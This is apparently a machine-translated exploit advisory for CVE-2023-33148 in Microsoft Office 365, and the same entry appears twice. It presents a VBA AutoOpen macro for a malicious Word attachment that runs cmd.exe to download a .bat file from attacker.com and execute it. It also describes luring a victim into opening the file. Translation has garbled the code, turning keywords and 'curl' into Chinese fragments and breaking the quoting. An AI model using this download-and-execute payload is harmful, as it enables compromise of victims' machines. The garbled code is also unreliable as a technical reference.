## title: Microsoft Office 365版本18.2305.1222.0-特权升高+ RCE。
##作者: nu11secur1ty
## date: 07.18.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
##参考: https://portswigger.net/web-security/access-control
## CVE-2023-33148
## Description:
Microsoft Office 365版本18.2305.1222.0应用程序很容易受到影响
特权升高。
攻击者可以使用这种脆弱性附加非常恶意的
Outlook应用中的Word文件,该应用是Microsoft Office 365的一部分
很容易诱使受害者点击它- 打开它,然后
在背景下执行非常危险的外壳命令
本地PC。此执行情况不下载此恶意文件,
这是一个潜在的问题,也是一个非常危险的案例!这可以
受害者PC的末端取决于场景。
## staus:高脆弱性
[+] exploit:
- 利用Server:
``VB
sub autoopen()
致电shell('cmd.exe /s /c''卷- s
https://attacker.com/uqev/namaikitiputkata/golemui.bat salaries.bat
。\ salaries.bat',vbnormalfocus)
结束子
````````
##复制:
[HREF](https://github.com/nu11secur1ty/windows11exploits/tree/main/main/2023/cve-2023-33148)
##证明和利用
[HREF](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)
##时间花费:
00:35:00
##作者: nu11secur1ty
## date: 07.18.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
##参考: https://portswigger.net/web-security/access-control
## CVE-2023-33148
## Description:
Microsoft Office 365版本18.2305.1222.0应用程序很容易受到影响
特权升高。
攻击者可以使用这种脆弱性附加非常恶意的
Outlook应用中的Word文件,该应用是Microsoft Office 365的一部分
很容易诱使受害者点击它- 打开它,然后
在背景下执行非常危险的外壳命令
本地PC。此执行情况不下载此恶意文件,
这是一个潜在的问题,也是一个非常危险的案例!这可以
受害者PC的末端取决于场景。
## staus:高脆弱性
[+] exploit:
- 利用Server:
``VB
sub autoopen()
致电shell('cmd.exe /s /c''卷- s
https://attacker.com/uqev/namaikitiputkata/golemui.bat salaries.bat
。\ salaries.bat',vbnormalfocus)
结束子
````````
##复制:
[HREF](https://github.com/nu11secur1ty/windows11exploits/tree/main/main/2023/cve-2023-33148)
##证明和利用
[HREF](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)
##时间花费:
00:35:00